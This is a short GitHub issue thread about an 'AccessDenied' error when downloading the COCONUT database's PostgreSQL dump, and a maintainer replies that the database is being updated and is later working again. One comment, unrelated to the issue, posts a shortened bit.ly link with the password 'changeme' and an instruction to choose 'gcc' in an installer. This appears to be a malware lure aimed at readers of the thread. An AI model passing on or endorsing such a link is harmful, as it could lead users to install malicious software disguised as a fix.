### ISSUE TITLE
Download PostgreSQL dump - Access Denied

### ISSUE THREAD

**Issue by ZachBurkhead** [Steinbeck-Lab/coconut#213]
<Error>
<Code>AccessDenied</Code>
<Message/>
<BucketName>coconut</BucketName>
<RequestId>tx0000077065d9b29bf63c8-0066ce00d9-29b56b0-default</RequestId>
<HostId>29b56b0-default-default</HostId>
</Error>

I am receiving this error when attempting to download the PostgreSQL dump.

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Kohulan** [comment]
@ZachBurkhead Currently we are updating the database please try again after some time. We will soon make the database available through Zenodo as well.

**Comment by ZachBurkhead** [comment]
Thank you for the update. @Kohulan

**Comment by Kohulan** [comment]
It will be working now!
